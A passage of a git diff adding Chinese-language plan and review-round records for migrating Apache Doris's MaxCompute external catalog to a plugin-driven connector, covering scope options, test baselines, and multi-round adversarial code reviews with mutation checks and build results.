`:146-149` legacy case。 +2. `GsonUtils` registerCompatibleSubtype:`MaxComputeExternalCatalog→PluginDrivenExternalCatalog`(~:405-412)、`MaxComputeExternalTable→PluginDrivenExternalTable`(~:478-483);保留 :397/:472 普通注册(image 兼容)。 +3. `PluginDrivenExternalCatalog.legacyLogTypeToCatalogType`(~:347):`MAX_COMPUTE` 自动 lowercase→`"max_compute"`,**无需** trino 那种连字符特例。 +4. `PluginDrivenExternalTable.getEngine()/getEngineTableTypeName()`(~:203-231):加 `case "max_compute"`(参 es/jdbc)。 +5. `TableIf.TableType.MAX_COMPUTE_EXTERNAL_TABLE`(TableIf:220)+ `InitCatalogLog.Type.MAX_COMPUTE`(:41):保留作 GSON/兼容。 + +--- + +## 6. McStructureHelper 去重(P1-T02 deferred → P4) + +- fe-core 副本 298 LOC vs 连接器副本 337 LOC = **已分叉**(连接器 +39 LOC,superset)。 +- fe-core 副本仅被 `MaxComputeExternalCatalog:229` 内部用,无外部 import。 +- 处置:连接器副本胜出;迁移后删 fe-core 副本。 + +--- + +## 7. 测试基线 + +- 连接器 `fe-connector-maxcompute`:**0 测试**。 +- legacy fe-core:2(`MaxComputeExternalMetaCacheTest`、`source/MaxComputeScanNodeTest`,JUnit4)。be-java-extensions:1(手写 fake)。 +- 兄弟连接器镜像样板:hudi 5 / trino 4 / hive 2 / hms 1(**JUnit5 + 手写替身,无 mockito**;checkstyle 含 test 源、禁 static import)。 + +--- + +## 8. ODPS SDK classloader 隔离(R-004) + +- SDK 仅在 fe-core(`com.aliyun.odps.*`:Odps/Account/TableTunnel/Storage API);连接器模块只用类型 stub(OdpsType/TypeInfo)。 +- `MaxComputeExternalCatalog` 持 per-catalog `odps`/`settings` 实例;`REGION_ZONE_MAP` static final(安全);**无** ThreadLocal / 全局 Odps 单例。 +- 裁决:**无明显 classloader 陷阱**;建议翻闸前在插件 harness 做一次防御性连通测试。 + +--- + +## 9. SCOPE FORK(待用户签字) + +| 方案 | 范围 | 风险 | 交付 | +|---|---|---|---| +| **B. Hybrid(推荐,镜像 P3/D-019)** | 硬化 dormant 读连接器(补 listPartitions、schema parity、limit-opt 复核)+ 连接器测试基线;gate 关、legacy 写路径不动 | 低(gate 关,零 live 风险)| 读侧 de-risk + 测试网;**不**翻闸、**不**删 legacy | +| **A. Full P4** | 设计+建写/事务 SPI(抽象 MCTransaction 专有方法)+ 迁读写 + 重构 Coordinator/FrontendServiceImpl/sinks + 翻闸 + 删 legacy | 高(动查询/RPC 热区 + 新 SPI 设计)| maxcompute 完整收口 | +| **C. 写-SPI RFC 先行** | 先把「连接器写/事务 SPI」作为独立设计产出(P4 maxcompute + P5 paimon 共用),再做 full P4 | 中(设计前置,跨阶段摊销)| 共享写 SPI + 之后 full | + +**推荐 B**:与 P3 一致、合用户「caution over speed」、gate 关零风险。代价:交付偏「准备」(不含 cutover),且写 SPI 工作迟早要做(P5 也需)。 +若用户要现在就投资写 SPI(P4+P5 共用),则 C→A。 + +--- + +## 10. 沿用坑(来自 HANDOFF/PROGRESS) + +- rebase 后 fe-core stale 生成 `DorisParser` → cannot find symbol:**clean fe-core**(非代码 bug)。 +- import-gate 只禁 connector→fe-core 单向、只扫 `*/src/main/java`;跨模块 parity 用 golden-value。 +- checkstyle 含 test 源、禁 static import、test 阶段不跑 → 单独 `mvn -pl checkstyle:check`。 +- ⚠️ PROGRESS/HANDOFF 仍写「P3 PR 已开(CI 中)」= 已 merge(`5c240dc7a34`),P4 kickoff 时一并校正。 diff --git a/plan-doc/reviews/P4-T06d-FIX-DDL-ENGINE-review-rounds.md b/plan-doc/reviews/P4-T06d-FIX-DDL-ENGINE-review-rounds.md new file mode 100644 index 00000000000000..22a52052060e86 --- /dev/null +++ b/plan-doc/reviews/P4-T06d-FIX-DDL-ENGINE-review-rounds.md @@ -0,0 +1,54 @@ +# FIX-DDL-ENGINE — 对抗 review 轮次记录 + +> 设计: `plan-doc/tasks/designs/P4-T06d-FIX-DDL-ENGINE-design.md`。修复: `CreateTableInfo.java` — +> `paddingEngineName` / `checkEngineWithCatalog` 各加 `PluginDrivenExternalCatalog` 分支 + 新 +> `private static pluginCatalogTypeToEngine`(`"max_compute"`→`ENGINE_MAXCOMPUTE`,其余 SPI 类型返 +> `null`)+ 1 import。新 UT `CreateTableInfoEngineCatalogTest`(5 例)。 +> +> 流程: clean-room(4 reviewer 先独立判 code、不读 plan-doc)→ 逐 finding 对抗 verify → cross-check 交叉核对 +> 设计结论 + parent critic(防开发先验 / reviewer 过度)。Workflow `wf_e8887334-53a`。 + +## Round 1 (4 clean-room reviewers → verify → cross-check) + +修复期已折入 parent 设计 `needs-revision` critic 的 5 项更正:① import 放 `:49 InternalCatalog` 后、 +`hive.*` 前;② 删 parent 错误 e2e 断言(SHOW CREATE TABLE 渲 `MAX_COMPUTE_EXTERNAL_TABLE` 非 +`ENGINE=maxcompute`);③ UT 经 mock CatalogMgr 按名注册 catalog(两网关按名 re-fetch);④ 补 CTAS +(`validateCreateTableAsSelect`);⑤ 补 Rule-9"错误显式 ENGINE 被拒"测试。另 + 1 项设计精炼(Rule 7): +helper 对未映射 SPI 类型**返 null 而非 throw**,使 jdbc/es/trino 在两网关均与 legacy 逐字一致(parent 的 +default-throw 会令 checkEngineWithCatalog 新拒 jdbc 显式 ENGINE)。 + +**4 reviewer lens(code-first,clean-room)**:correctness-parity / regression-blast / test-quality-rule9 / +build-style-redline。6 raw findings → 逐条对抗 verify → **仅 1 条 confirmed real**,其余 5 条经独立复核证伪 +(invalid / not real)。 + +**唯一存活 finding(nit,disposition=acceptable-as-is)** +- `correctExplicitEnginePassesForPluginDriven`(test:164-170)作为**回归探测器对新分支是 vacuous**:engine= + `maxcompute` 时,pre-fix(无 PluginDriven 分支→fall-through 不抛)与 post-fix(`pluginEngine="maxcompute"` → + 守卫 `!= null && !equals` 短路 false→不抛)**两路都不抛**,故 `assertDoesNotThrow` 移除 fix 也不会红。 +- **判定 acceptable-as-is(非覆盖缺口)**:新 `checkEngineWithCatalog` 分支的真正回归守门是兄弟用例 + `wrongExplicitEngineRejectedForPluginDriven`(test:151-161,ENGINE=hive→assertThrows),verify 已确认其 + **pre-fix 必红**(无分支→不抛→assertThrows 失败),与本地 mutation 自证一致。该正向用例仍有文档价值,且能抓 + "条件写反"(若误写成 `&& equals` 会误抛)的 mutation,保留。reviewer 自身措辞为 "consider/acknowledge", + 非要求改动;其建议的 "state assertion" 不可行(成功路径 checkEngineWithCatalog 无可观察副作用)。 + +**cross-check:6 项设计更正全部"已在 code 落地"核实通过**(import 位置 / 错误 e2e 断言已删 / 按名注册 / +CTAS 覆盖 / Rule-9 拒测 / null-helper 两网关 parity);**code 与设计零矛盾**;无 blocker/major;无开发先验偏、无 +reviewer 过度。 + +## 收敛结论 + +Round 1 → **verdict: `sound`,1 轮收敛,可 commit**。唯一 nit acceptable-as-is,不改 code/设计。 + +**本地守门复证**(非后台 task echo): +- UT: `mvn -pl :fe-core -am test -Dtest=CreateTableInfoEngineCatalogTest` → Tests run: 5, Failures: 0, + Errors: 0;BUILD SUCCESS(MVN_EXIT=0)。 +- Rule-9 mutation: helper `max_compute` 返 `null` → test 1(ERROR "does not support create table")/ + test 2(`expected: but was:`)/ test 3("nothing was thrown")三红;test 4/5 不受此 + mutation 影响(各守其它 mutation)。复原后 5/5 绿。 +- Checkstyle: `mvn -pl :fe-core checkstyle:check` → 0 violations(CS_EXIT=0),import-gate clean。 + +**跨轮**: 单轮,无矛盾。 + +**红线复核**: 未触 `PartitionsTableValuedFunction.java:173` MaxCompute 分支(build-style-redline lens + +cross-check 均确认);legacy `MaxComputeExternalCatalog` import 仍在(Batch-D 删除前的 keep-set 顺序依赖, +已在设计 §Batch-D 登记)。 diff --git a/plan-doc/reviews/P4-T06d-FIX-DDL-REMOTE-review-rounds.md b/plan-doc/reviews/P4-T06d-FIX-DDL-REMOTE-review-rounds.md new file mode 100644 index 00000000000000..98d5bb9a240bbb --- /dev/null +++ b/plan-doc/reviews/P4-T06d-FIX-DDL-REMOTE-review-rounds.md @@ -0,0 +1,43 @@ +# P4-T06d · FIX-DDL-REMOTE — 对抗 review 轮次记录 + +> issue 4 / 6。设计: `plan-doc/tasks/designs/P4-T06d-FIX-DDL-REMOTE-design.md`。 +> 流程: clean-room 多 agent 对抗(Phase A 仅读代码独立判断 → Phase B 3 票 refute-by-default → Phase C 交叉核对设计/parent critic)→ 有 real-new-gap 则回设计循环(≤5 轮)。 +> 改动文件: `PluginDrivenExternalCatalog.java`(createTable/dropTable 两 override)+ `PluginDrivenExternalCatalogDdlRoutingTest.java`。 + +## Round 1 — verdict: `needs-revision`(3 findings,全 test-quality,production code CLEAN) + +review 配置: 4 lens clean-room reviewer(correctness-parity / regression-blast / test-quality / edge-spi)→ 每 finding 3 skeptic refute-by-default(≥2 confirm 存活)→ Phase C 对照设计交叉核对。raw findings 经对抗后 3 条存活且 Phase C 判 `real-new-gap`。 + +**关键结论(Phase B/C 一致)**: **production code 正确**,无需改源码。三条全是 test-quality(Rule 9):测试只锁住了不变式的 **REMOTE 名一半**(连接器收到 remote-resolved 名),未锁 **LOCAL 名一半**(editlog `persist.CreateTableInfo`/`DropInfo` + `getDbForReplay` 查询键有意用本地名,保 follower replay 一致)。 + +| id | sev | 标题 | 处置 | +|---|---|---|---| +| F3 | minor | editlog/`getDbForReplay` 的 LOCAL 名只由注释声明、无测试锁(CREATE 侧 `logCreateTable` 实参从未校验;`getDbForReplay` stub 对任意 arg 返回同一 replay db) | ✅ 已修 | +| F6 | minor | DROP 侧 `logDropTable` 仅 `Mockito.any()` 校验,未断言 `DropInfo` 携带本地名 | ✅ 已修 | +| F12 | nit | drop happy-path 用同一 db mock 兼作 resolution + replay,无法捕获 "unregister 走 resolution db 而非 getDbForReplay" 的退化(create 侧已正确分离) | ✅ 已修 | + +**修复(test-only,零源码改动)**: +1. F3/F6 — 加 `ArgumentCaptor`:`logCreateTable` 捕 `persist.CreateTableInfo` 断言 `getDbName()=="db1"`/`getTblName()=="t1"`(本地);`logDropTable` 捕 `DropInfo` 断言 `getDb()=="db1"`/`getTableName()=="t1"`(本地)。`TestablePluginCatalog` 加 `lastGetDbForReplayArg` 记录 `getDbForReplay` 实参,断言 == 本地名。CREATE 缓存用例硬化为 remote `DB1` ≠ local `db1`,使本地名断言有判别力。 +2. F12 — drop happy-path 用 **distinct** resolution db vs replayDb;断言 `verify(replayDb).unregisterTable("t1")` + `verify(db, never()).unregisterTable(...)`。 + +**mutation 自证(Round-1 修复)**: 把 4 处本地名用法翻成 remote(`createTableInfo.getDbName()`/`dbName`→`db.getRemoteName()`/`dorisTable.getRemote*()`,见 `PluginDrivenExternalCatalog.java:288/296/406/407)→ `testCreateTableInvalidatesDbCacheUsingLocalNames` 与 `testDropTableResolvesRemoteNamesRoutesAndUnregisters` **双红**。复原后 17/17 绿。 + +**Round-1 基础 mutation(remote-name 解析 + db-null 闸,修复前已验)**: 翻 createTable `db.getRemoteName()`→local + dropTable remote→local + db==null 改 ifExists-gate → 5 红(`testCreateTablePassesRemoteDbNameToConverter` / `testDropTableResolvesRemoteNamesRoutesAndUnregisters` / `testDropTableHandleAbsentAfterLocalResolveIsNoopWithIfExists` / `testDropTableWrapsConnectorException` / `testDropTableMissingDbThrowsEvenWithIfExists`),证 remote 解析与 db-null 无条件抛均 load-bearing。 + +**Phase C 对照(parent critic 既有约束)**: 本批 review 未重复 parent 的 corrections(逐字节一致/blast-radius/non-goal 等)—— 那些在设计 §"须显式登记的偏差/non-goal" 已折入并 clean,Phase C 未将其判为 new-gap,符合预期(不跨轮矛盾)。 + +## Round 2 — focused recheck(test delta) + +review 配置: 3 lens 独立 reviewer(captor 非 vacuous / 无新覆盖回退 / 编译·mock-soundness)judge round-1 的 F3/F6/F12 是否真解决 + 是否引入新 test 缺陷;新 finding 走 3 票 refute-by-default。 + +**verdict: `converged`**(workflow `w8u1xi1jg`,6 agent)。三 lens 一致:F3/F6/F12 全 resolved(`[true,true,true]`×3),`confirmedNew=[]`(verify 阶段一度浮出的候选新发现被 3 票 refute,未存活)。 +逐条复核(仅读代码): +- F3 — captor `ArgumentCaptor.forClass(org.apache.doris.persist.CreateTableInfo.class)` 与 `EditLog.logCreateTable(CreateTableInfo)` 参数类型精确匹配(FQN 用法避开与 nereids `CreateTableInfo` import 冲突);remote `DB1`≠local `db1` 使本地名断言有判别力,remote-mutation→`getDbName()=="DB1"`→红。 +- F6 — captor `DropInfo` 匹配 `logDropTable(DropInfo)`;`getDb()/getTableName()` 真实 getter,remote-mutation→红。 +- F12 — resolution db vs replayDb 真分离;`verify(replayDb).unregisterTable("t1")` + `verify(db, never()).unregisterTable(...)`。 +- 非 vacuous 核验:所有被 stub/verify 的方法(`getRemoteName`/`getRemoteDbName`/`getTableNullable`/`unregisterTable`/`resetMetaCacheNames`)均 public/non-final → Mockito 可拦截;converter 断言捕 `convert()` 第二参而非 mocked req,避开 vacuous 陷阱;`testDropTableMissingDbThrowsEvenWithIfExists` 精确编码 base `ExternalCatalog.dropTable:1119-1129` 语义(缺库无条件抛、缺表才 ifExists)。 + +## 收敛结论 +Round 1(needs-revision,3 test-quality)→ 修(test-only)→ Round 2(converged)。**2 轮收敛**。production code 自始 CLEAN(两轮 reviewer 一致),改动仅强化测试对 follower-replay LOCAL-name 不变式的 mutation 锁。 +最终守门(restored clean source,cache 关):UT 17/17 绿;Checkstyle 0;BUILD SUCCESS。 +- mutation 总账:remote-name 解析 + db-null 无条件抛(round-1,5 红)+ editlog/getDbForReplay LOCAL-name(round-2,2 红)—— 各业务点均有测试 bite。 diff --git a/plan-doc/reviews/P4-T06d-FIX-PART-GATES-review-rounds.md b/plan-doc/reviews/P4-T06d-FIX-PART-GATES-review-rounds.md new file mode 100644 index 00000000000000..482618f8e1ac78 --- /dev/null +++ b/plan-doc/reviews/P4-T06d-FIX-PART-GATES-review-rounds.md @@ -0,0 +1,46 @@ +# P4-T06d · FIX-PART-GATES — 对抗 review 轮次记录 + +> issue 5 / 6。设计: `plan-doc/tasks/designs/P4-T06d-FIX-PART-GATES-design.md`。 +> 流程: clean-room 多 agent 对抗(Phase A 仅读代码 5 lens → Phase B 3 票 refute-by-default → Phase C 交叉核对设计/parent critic)。 +> 改动: 新 `PluginDrivenSchemaCacheValue.java` + `PluginDrivenExternalTable.java`(initSchema 填分区列 + 4 override)+ `PartitionsTableValuedFunction.java`(analyze 3 网关)+ 2 新测试。 + +> ⚠️ **2026-06-08 更正(DG-1 / D-031 / DV-015)**:下文「**pruning 不变式 clean**」/「production CLEAN」的裁决**过度声明**,须按此更正。本 review 验证的是**分区元数据可见性**(SHOW PARTITIONS / partitions TVF / Nereids 能算 `SelectedPartitions`)正确——这层站得住。但「分区裁剪端到端生效」(算出的裁剪集真正下推到 ODPS read session `requiredPartitions`)**未**被本 fix 实现,亦未被本 review 覆盖:translator 丢弃 `SelectedPartitions`、`MaxComputeScanPlanProvider` 恒传 `emptyList` → read session 跨全分区(纯性能/内存回归,行正确)。该缺口由后续复审 **DG-1** 锁定、**FIX-PRUNE-PUSHDOWN(D-031)** 修复。故下文「pruning 不变式」应读作「**分区元数据/可见性**不变式」,不含 read-session 下推。 + +## Round 1 — verdict: `needs-revision`(4 findings 全 test-quality,production code CLEAN) + +review 配置: 5 lens(parity / pruning-invariant / cache / tvf-redline / test-quality)→ 每 finding 3 skeptic → Phase C 交叉核对。64 agent。 + +**关键结论(Phase B/C 一致)**: **production code 正确**(parity / pruning 不变式 / cache cast / Batch-D 红线 / 决策① gating 均 clean)。4 条存活 real-gap **全是同一处 test-quality**:`PartitionsTableValuedFunctionPluginDrivenTest` 对 SEAM-2(表类型 allow-list)覆盖 vacuous。 + +| id | sev | 标题 | 处置 | +|---|---|---|---| +| F6/F13/F16 | minor | TVF 测试 stub 了 `db.getTableOrMetaException(name, types...)`,绕过真实表类型 allow-list → 删 `TableType.PLUGIN_EXTERNAL_TABLE`(:189)不会令测试变红;doc 声称的 SEAM-2 覆盖不成立 | ✅ 已修 | +| F15 | **major** | 正向用例 `testAnalyzePasses` 无断言,仅"无异常";若 table 解析返 null(`null instanceof X`=false 跳所有守卫)则 vacuous 通过,且无法捕 SEAM-3 分支删除(仅捕反转) | ✅ 已修 | +| F9 | major | `getNameToPartitionItems` 每次 query bind 走未缓存 `listPartitions` 远端往返(legacy 用二级 cache)| ✅ already-registered-non-goal(设计 §决策 CACHE-P1 已登记;Phase C 判定非新 gap) | + +**修复(test-only,零源码改动)**: +1. F6/F13/F16(SEAM-2)— `invokeAnalyze` 改用 `Mockito.mock(DatabaseIf.class, CALLS_REAL_METHODS)`,仅 stub 单参 `getTableOrMetaException("t")` + `table.getType()=PLUGIN_EXTERNAL_TABLE`,使**真实** allow-list 成员检查(`DatabaseIf:170-179`)执行。`PLUGIN_EXTERNAL_TABLE.getParentType()` 返自身,故从 allow-list 删 PLUGIN → list 不含 → 抛 MetaNotFound→AnalysisException → 测试红。 +2. F15(正向 vacuous)— `testAnalyzePasses` 加 `Mockito.verify(table).isPartitionedTable()`:证 table 真被解析(非 null)且 SEAM-3 守卫被触达;null 解析或 SEAM-3 分支删除均令 verify 红。 + +**mutation 自证(Round-1 修复)**: +- M1(删 `PartitionsTableValuedFunction:189` 的 `TableType.PLUGIN_EXTERNAL_TABLE`)→ 正+负用例**双红**(正:MetaNotFound 前置使 verify 不达;负:报错文案变 "doesn't match" 非 "not a partitioned table")。 +- M2(删整个 SEAM-3 PluginDriven 守卫块)→ 双红(正:`verify(isPartitionedTable)` 因分支删除不达;负:不抛)。 + +**Round-1 基础 mutation(修复前已验,4 业务点)**: M-A initSchema raw→mapped(用 raw)→ initSchema 测试红;M-B getNameToPartitionItems 远端名索引(错 key)→ 该测试红;M-C SEAM-3 守卫禁用 → 负用例红;M-D supportInternalPartitionPruned+isPartitionedTable 无条件 true → 非分区用例红。证 partition override + 决策① + 远端名索引 + raw→mapped 桥接 + TVF 守卫 均 load-bearing。 + +**Phase C 未判为 new-gap 的存活项(防跨轮矛盾)**: F9(per-call 远端往返)= already-registered-non-goal(设计 §决策 CACHE-P1)。其余 parity/pruning/cache/redline lens 的 raw findings 经 Phase B 证伪或 Phase C 判 already-addressed,无 production 改动需求。 + +## Round 2 — focused recheck(TVF 测试 delta) +review 配置: 3 lens(CALLS_REAL_METHODS 链真跑? / 正向非 vacuous? / 编译·mock soundness)judge SEAM-2 + 正向 vacuity 是否解决 + 新缺陷;新 finding 3 票 refute。 + +**verdict: `converged`**(workflow `wwxccw2i2`)。三 lens 一致:`seam2_resolved=[true,true,true]`、`positive_test_resolved=[true,true,true]`、`confirmedNew=[]`。 +逐点复核(仅读代码): +- SEAM-2 非 vacuous:`CALLS_REAL_METHODS` 下 varargs(:181)→List(:170)默认方法真跑;List 内对 `this.getTableOrMetaException("t")`(单参)的 self-call 被 mockito-inline 拦截命中 stub 返 table,随后**真实** `contains` 成员检查跑在 `table.getType()=PLUGIN_EXTERNAL_TABLE` 上。单参 "t" 经 Java 定参优先(phase 1/2)无歧义绑定 `DatabaseIf:150`,非 varargs 零参形式。`getParentType()` 返自身 → 成员判定纯依赖 production allow-list 含 PLUGIN → M1 删之即 MetaNotFound→AnalysisException→双红。 +- 正向非 vacuous:`isPartitionedTable()` 全仓仅 `PartitionsTableValuedFunction:215`(SEAM-3 内)一处调用 → `verify(table).isPartitionedTable()` 捕 SEAM-3 分支删除(M2)+ null 解析(`Objects.requireNonNull(table.getType())` NPE / 前置 throw 不达 verify)。 +- 负用例:mock 仅 PluginDriven,instanceof HMS/MC 假,SEAM-3(:216)是唯一可达的 "not a partitioned table" throw,文案归属无歧义。 +- mock soundness:`CALLS_REAL_METHODS` 执行路径不碰未 stub 抽象方法/静态/LOG → 无伪 NPE;AnalysisException 为 nereids RuntimeException,prod/test import 一致;无未用 import。 + +## 收敛结论 +Round 1(needs-revision,4 test-quality,production CLEAN)→ 修(test-only)→ Round 2(converged)。**2 轮收敛**。production code 自始正确(parity / pruning 不变式 / cache cast / Batch-D 红线 / 决策① 两轮一致)。 +最终守门(clean source,cache 关):UT 38/38 绿(含 6 partition + 2 TVF);Checkstyle 0;BUILD SUCCESS。 +mutation 总账: round-1(initSchema raw→mapped / getNameToPartitionItems 远端名 / SEAM-3 守卫 / 决策① gating)4 红 + round-2(SEAM-2 allow-list 删 / SEAM-3 块删)各双红。 diff --git a/plan-doc/reviews/P4-T06d-FIX-READ-DESC-review-rounds.md b/plan-doc/reviews/P4-T06d-FIX-READ-DESC-review-rounds.md new file mode 100644 index 00000000000000..61b0287fced3d9 --- /dev/null +++ b/plan-doc/reviews/P4-T06d-FIX-READ-DESC-review-rounds.md @@ -0,0 +1,54 @@ +# FIX-READ-DESC — 对抗 review 轮次记录 + +> 目的: 记录每轮 review 的 finding + verdict + 处置,防跨轮结论矛盾。max 5 轮。 +> 设计: `plan-doc/tasks/designs/P4-T06d-FIX-READ-DESC-design.md`。 + +## Round 1 (3 clean-room reviewers,distinct lenses) + +**R1 — 正确性 / BE parity: ✅ CLEAN** +- TMCTable 字段集与 legacy `MaxComputeExternalTable.toThrift` 逐一致(endpoint/quota/project/table/properties),无 BE 读取字段遗漏。 +- BE 无 `__isset` 守卫的 deprecated 字段(region/access_key/...) 未 set → thrift 默认空串(非 UB),与 legacy 一致;endpoint/quota 有守卫,已 set。 +- 产出 `MAX_COMPUTE_TABLE` + mcTable 满足 `file_scanner.cpp:1069` static_cast 与 `max_compute_jni_reader.cpp` 消费;凭证经 properties map(同 legacy)。 +- project/table 用 remote 名与 SPI 读 session(`TableIdentifier.of(remoteDb,remoteTbl)`)一致;MC 无 name-mapping → 实际 local==remote,等价 legacy 且映射开启时更正确(OQ-7 有意修正)。 +- BE 不读 descriptor 的 _database 作 MC 读 → 6th ctor 参 benign。 + +**R3 — 回归 / blast-radius / build: ✅ CLEAN (0 blocking, 2 info)** +- ctor 全仓仅 2 调用点(`MaxComputeDorisConnector.getMetadata` + 新 UT),均已改 6 参;无残留 3 参调用。 +- `getMetadata` 先 `ensureInitialized()`(:159) 再构造(:160);endpoint/quota 在 doInit 赋值、properties final → 无 read-before-init。 +- properties map 非 init 后变更,与 legacy 同 by-ref posture,thrift 序列化 copy → 无 aliasing。 +- keep-set 干净:仅 2 连接器文件 + 1 新测试 + docs;未触 BE/thrift/fe-core/legacy。 +- gates 独立重跑: **MVN_EXIT=0 / CS_EXIT=0 / IMPORTS_EXIT=0**,新 UT 实跑 `Tests run: 1`。 + +**R2 — 测试有效性 (Rule 9): ⚠️ ISSUES FOUND (3)** +- **[medium] 调用点 wiring 无测试守门 + 设计 doc 过度声明**: 连接器 UT(正确地)够不到 fe-core 调用点 `PluginDrivenExternalTable.toThrift:247-251`(传 `db.getRemoteName()`/`getRemoteName()`/`schema.size()`)。设计称该缺口"仅 e2e 可覆盖",但 `fe/fe-core/src/test/.../PluginDrivenExternalTableEngineTest.java` 已有 mock Connector/ConnectorMetadata/ExternalDatabase 的 harness → 可用 Mockito ArgumentCaptor 廉价补 fe-core 调用点测试,断言 dbName/remoteName/numCols。caveat: toThrift 调 makeSureInitialized()+getFullSchema() → 比 engine-name 测试多些 setup,但远低于 e2e。 +- **[low] in-module 测试对陈旧 ~/.m2 connector-api jar 脆弱**: 不带 `-am` 跑会 NoClassDefFoundError(ConnectorTransaction);带 `-am` 通过。非测试代码缺陷,属已知 build gotcha(坑6:改连接器须 -am)。 +- **[low] numCols/catalogId 在 in-module 不可观测**: TTableDescriptor 无 numCols getter,connector UT 无法断言 numCols 转发 → 被 [medium] 的调用点测试覆盖即解决;catalogId legacy 本就忽略(正确)。 + +**Round 1 处置决定**: +- [medium] → **Round 2 修复**: 尝试在 fe-core 补调用点测试(ArgumentCaptor 断言 remote dbName/remoteName + numCols=schema.size());若 Env 单例 scaffolding 过重/脆,则回退为"修正设计 doc 过度声明 + 代码静读验证 numCols 转发",并 fail-loud 登记残留 gap。 +- [low ×2] → 文档登记(-am 要求已是坑6;numCols 由 [medium] 解决)。非阻塞。 +- R1/R3 无 code 缺陷 → 生产代码本轮不改。 + +## Round 2 (修复 Round-1 [medium]) + +- **处置**: 在 fe-core 新增调用点测试 `PluginDrivenExternalTableEngineTest#testToThriftPassesRemoteNamesAndNumColsToBuildTableDescriptor`,用 Mockito ArgumentCaptor 捕获 `metadata.buildTableDescriptor(...)` 实参,断言 `dbName=="REMOTE_DB"`(=db.getRemoteName)、`remoteName=="REMOTE_TBL"`(=table.getRemoteName)、`numCols==3`(=schema.size)。复用既有 `TestablePluginCatalog` harness(扩 ctor 注入可控 ConnectorMetadata + override `getConnector()` 绕过 Env init)。 +- **可行性**: 反例预期(Round-1 caveat 担心 Env 单例过重)未成立 —— toThrift 仅经 makeSureInitialized/getFullSchema/getConnector 触 Env,三者均可在测试子类/TestablePluginCatalog override,无需起真 Env/CatalogMgr。 +- **Rule 9 mutation 自证**: 临时把调用点改成 `db.getFullName()`/`getName()`/`schema.size()+1` → 测试 FAIL(`expected but was `),恢复生产文件。 +- **产物**: 仅 test + design doc;**生产代码本轮零改**。设计 doc 删除"e2e-only"过度声明,改为"调用点已由 fe-core 测试覆盖";补 build note(`-am` + `-DfailIfNoTests=false`)。 +- **gates**: MVN_EXIT=0(Tests run: 10)/CS_EXIT=0。 + +## Round 3 (独立验证 Round-2 test,非作者) + +- **R-verify: ✅ CLEAN** + - git diff 确认 `fe/fe-core/src/main` 本轮零改;唯一 fe-core 改动为该测试文件;Round-1 连接器 fix 仍在。 + - 测试**非 vacuous**: 三个 override 只 stub Env/cache/init plumbing,被断言的实参全经真实 `toThrift()` body(:247-251)流出;`buildConnectorSession()` 未 override,走真实 ctx==null 路径。 + - 独立复现 mutation: 改本地名 → `Tests run:1, Failures:1`(dbName 断言先挂),恢复后 `git diff src/main` 空。 + - 扩展的 TestablePluginCatalog ctor 未破坏其余 9 测试(`Tests run: 10` 全过)。 + - MVN_EXIT=0 / CS_EXIT=0;working tree 完整(生产 clean + Round-2 test + Round-1 fix)。 + +## 收敛结论 + +Round-1 唯一实质 finding([medium] 调用点无测试守门 + doc 过度声明)已在 Round-2 修复、Round-3 独立验证 CLEAN。**review 不再产生新问题 → FIX-READ-DESC 收敛,可 commit**。R1/R3 的正确性/回归/build 维度本就 CLEAN。 + +无跨轮矛盾:Round-1 R2 的 [medium] 在 Round-2 关闭、Round-3 确认;两个 [low](-am 要求 / numCols 不可观测)分别由 build note 登记、由调用点测试覆盖。 + diff --git a/plan-doc/reviews/P4-T06d-FIX-READ-SPLIT-review-rounds.md b/plan-doc/reviews/P4-T06d-FIX-READ-SPLIT-review-rounds.md new file mode 100644 index 00000000000000..f764025f10f681 --- /dev/null +++ b/plan-doc/reviews/P4-T06d-FIX-READ-SPLIT-review-rounds.md @@ -0,0 +1,27 @@ +# FIX-READ-SPLIT — 对抗 review 轮次记录 + +> 设计: `plan-doc/tasks/designs/P4-T06d-FIX-READ-SPLIT-design.md`。修复: `MaxComputeScanPlanProvider` byte_size 分支 `.length(splitByteSize)` → `.length(-1L)`(恢复 BE BYTE_SIZE/ROW_OFFSET sentinel)。 + +## Round 1 (2 clean-room reviewers + 修复期已折 critic 更正) + +修复期已处理 parent 设计的 critic 更正:`getLength()` byte_size 实有 **3** 个消费者(非 2):setPath、setSize、`PluginDrivenSplit:42→FileSplit.length`(→`FederationBackendPolicy:499` 一致性哈希 + `FileQueryScanNode:430` totalFileSize)。已在 T06d 设计 + parent 设计登记。UT 取 **provider-level**(非 parent 设计的弱 range-level),mutation 自证。 + +**R-A — 正确性 / blast-radius / legacy parity: ✅ CLEAN** +- 改的是 byte_size 分支(:272);row_offset(`:290 .length(count)`)/ limit-opt(`:338 .length(rowsToRead)`)未动且仍发真实计数;连接器内仅此 3 个 split builder,无遗漏。 +- 3 个 `getLength()=-1` 消费者全安全:① BE `split_size==-1`⇒BYTE_SIZE(`IndexedInputSplit` 只用 split index,忽略 size);② `FederationBackendPolicy:499` 哈希 -1 为常量分量,真正区分靠 `/byte_size` 路径 + 唯一 start,确定且与 legacy 逐字一致;③ `totalFileSize+=-1` 转负仅供 EXPLAIN/stats,且 `applyMaxFileSplitNumLimit:767` 有 `<=0` early-return 守卫(无负除);`getSplitWeight` 不用 length;`getLength()*selectedSplitNum`(:387)路径因 PluginDrivenScanNode 不 override isBatchMode 而不可达。 +- legacy parity 精确恢复:`MaxComputeScanNode:658-659` byte_size = `MaxComputeSplit(BYTE_SIZE_PATH, splitIndex, -1, byteSize, ...)`(arg3 length=-1,真实字节进未读的 fileLength);新连接器 `populateRangeParams:120-122` 逐字复刻(path `"[ start , -1 ]"`/startOffset/size=-1)。 +- scope:仅连接器 1 生产行 + 新 UT;BE/thrift/gensrc/legacy/fe-core 生产零改。 + +**R-B — 测试有效性 (Rule 9): ✅ CLEAN** +- UT 经反射调真实 private `buildSplitsFromSession`(含被改的 `.length(-1L)` 行),用离线 Serializable fakes 返真实 `IndexedInputSplit`,读回 `populateRangeParams` 产物 → 断 `getSize()==-1`/startOffset/path。非弱 range-level。 +- mutation 独立复现:还原 `.length(splitByteSize)` → `byteSizeBranchEmitsMinusOneSizeSentinel` FAIL(`expected <-1> but was <268435456>`),仅 1/2 失败(row_offset 对照仍过 → 断言特异)。复原后生产 diff 干净。 +- 反射 rename → `NoSuchMethodException` JUnit ERROR(fail loud,不会静默 vacuous);连接器无 fe-core/Mockito、`buildSplitsFromSession` 私有无公开 seam → 反射合理(minor)。 +- 对照锁定:`rowOffsetBranchKeepsRealRowCount` 断 `getSize()==1000`,防"全置 -1"过广回归。 +- gates: MVN_EXIT=0(Tests run: 5,4 跑 1 skip=OdpsLiveConnectivityTest)/CS_EXIT=0。 + +## 收敛结论 + +Round 